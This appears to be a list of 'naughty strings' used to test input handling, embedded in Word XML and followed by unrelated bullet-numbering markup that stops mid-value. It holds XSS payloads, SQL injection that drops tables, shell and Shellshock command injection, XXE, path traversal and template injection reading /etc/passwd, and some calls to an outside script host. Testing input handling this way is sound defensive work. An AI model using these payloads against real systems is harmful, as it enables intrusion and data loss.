--&gt;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&lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt;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 src="/\%(jscript)s"&gt;&lt;/script&gt;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 src="\\%(jscript)s"&gt;&lt;/script&gt;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"""&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt;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SRC=javascript:alert(String.fromCharCode(50,48,55))&gt;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SRC=# onmouseover="alert(‘208’)"&gt;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 onmouseover="alert(‘209’)"&gt;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onmouseover="alert(‘210’)"&gt;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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt;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&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000050&amp;#0000049&amp;#0000050&amp;#0000039&amp;#0000041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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt;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SRC="jav   ascript:alert(‘214’);"&gt;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SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt;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SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt;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SRC="jav&amp;#x0D;ascript:alert(‘217’);"&gt;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perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out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SRC=" &amp;#14;  javascript:alert(‘219’);"&gt;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&lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;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&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt;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&lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt;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&lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt;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 SRC=http://ha.ckers.org/xss.js?&lt; B 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 SRC=//ha.ckers.org/.j&gt;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SRC=“javascript:alert(‘222’)”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&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;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\";alert(‘223’);//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&lt;u oncopy=alert()&gt; Copy me&lt;/u&gt;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 onwheel=alert(224)&gt; Scroll over me &lt;/i&gt;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&lt;plaintext&gt;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http://a/%%30%30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&lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt;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1;DROP TABLE users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1'; DROP TABLE users-- 1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 OR 1=1 -- 1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 OR ‘1’='1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'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --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 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%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_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--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--version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--help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$USER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/dev/null; touch /tmp/blns.fail ; echo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`touch /tmp/blns.fail`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$(touch /tmp/blns.fail)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@{[system “touch /tmp/blns.fail”]}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eval("puts ‘hello world’")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System("ls -al /")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`ls -al /`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Kernel.exec("ls -al /")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Kernel.exit(1)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%x('ls -al /')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&lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;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$HOME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$ENV{‘HOME’}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%d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%s%s%s%s%s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{0}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%*.*s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%@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%n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File:///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../../../../../../../../../../../etc/passwd%00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../../../../../../../../../../../etc/hosts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() { 0; }; touch /tmp/blns.shellshock1.fail;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() { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; }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&lt;&lt;&lt; %s(un='%s') = %u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+++ATH0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CON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PRN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AUX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CLOCK$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NUL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A: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ZZ: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COM1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LPT1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LPT2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LPT3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COM2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COM3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COM4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DCC SEND STARTKEYLOGGER 0 0 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Scunthorpe General Hospital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Penistone Community Church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Lightwater Country Park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Jimmy Clitheroe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Horniman Museum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shitake mushrooms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RomansInSussex.co.uk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http://www.cum.qc.ca/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Craig Cockburn, Software Specialist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Linda Callahan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Dr. Herman I. Libshitz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magna cum laude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Super Bowl XXX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medieval erection of parapets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evaluate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mocha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expression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Arsenal canal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classic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Tyson Gay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Dick Van Dyke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basement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If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.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Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue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But now...[20Cfor my greatest trick...[8m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The quick brown fox... [Beeeep]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Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗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🏳0🌈️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జ్ఞ‌ా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گچپژ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{% print ‘x’ * 64 * 1024**3 %}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{{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read() }}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En dash –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Em dash —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Horizontal bar ―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Figure dash ‒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Swung dash ⁓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Single opening quote ‘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Single closing quote ’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Double opening quote “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Double closing quote ”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Copyright ©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Registered ®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Trademark ™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Section §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Paragraph ¶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Ellipsis …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Optional hyphen ¬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Non-breaking hyphen ߛ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Em space ߓ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En space ߒ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Quarter space ߕ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  <p2:lvl p2:ilvl="3">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="1920" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Symbol" p2:hAnsi="Symbol"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="4">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val="o"/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="2400" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Courier New" p2:hAnsi="Courier New"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="5">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="2880" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Wingdings" p2:hAnsi="Wingdings"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="6">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="3360" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Symbol" p2:hAnsi="Symbol"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="7">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val="o"/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="3840" p2:hanging="240"/>
      </p2:pPr>
      <p2:rPr>
        <p2:rFonts p2:hint="default" p2:ascii="Courier New" p2:hAnsi="Courier New"/>
      </p2:rPr>
    </p2:lvl>
    <p2:lvl p2:ilvl="8">
      <p2:numFmt p2:val="bullet"/>
      <p2:lvlText p2:val=""/>
      <p2:lvlJc p2:val="left"/>
      <p2:pPr>
        <p2:ind p2:left="432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